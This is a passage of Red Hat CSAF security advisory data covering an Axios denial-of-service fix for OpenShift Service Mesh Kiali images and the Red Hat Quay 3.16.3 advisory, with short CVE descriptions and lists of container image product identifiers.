"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64"
],
"known_not_affected": [
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T17:26:20+00:00",
"details": "See Kiali 2.17.4 documentation at https://docs.redhat.com/en/documentation/red_hat_openshift_service_mesh/3.2/html/observability/kiali-operator-provided-by-red-hat",
"product_ids": [
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3109"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:6497
Vulnerability from csaf_redhat - Published: 2026-04-02 15:17 - Updated: 2026-04-16 11:09A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect servers. The cache-backed state and request-token storage within Authlib is not securely linked to the user's initiating session. This vulnerability allows a remote attacker to exploit a Cross-Site Request Forgery (CSRF) by obtaining a valid state, which can lead to unauthorized actions being performed on behalf of the user.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library's internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.16.3 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.16.3",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6497",
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68158",
"url": "https://access.redhat.com/security/cve/CVE-2025-68158"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27628",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28498",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6497.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.16.3",
"tracking": {
"current_release_date": "2026-04-16T11:09:15+00:00",
"generator": {
"date": "2026-04-16T11:09:15+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6497",
"initial_release_date": "2026-04-02T15:17:12+00:00",
"revision_history": [
{
"date": "2026-04-02T15:17:12+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-02T15:17:28+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:15+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.16",
"product": {
"name": "Red Hat Quay 3.16",
"product_id": "Red Hat Quay 3.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.16::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3Aa48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785431"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3A943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784956"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785412"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784980"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773781267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel9@sha256%3Aaf9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785008"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel9@sha256%3A618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773785566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3A1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774539928"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel9@sha256%3A7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773784969"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"product_identification_helper": {
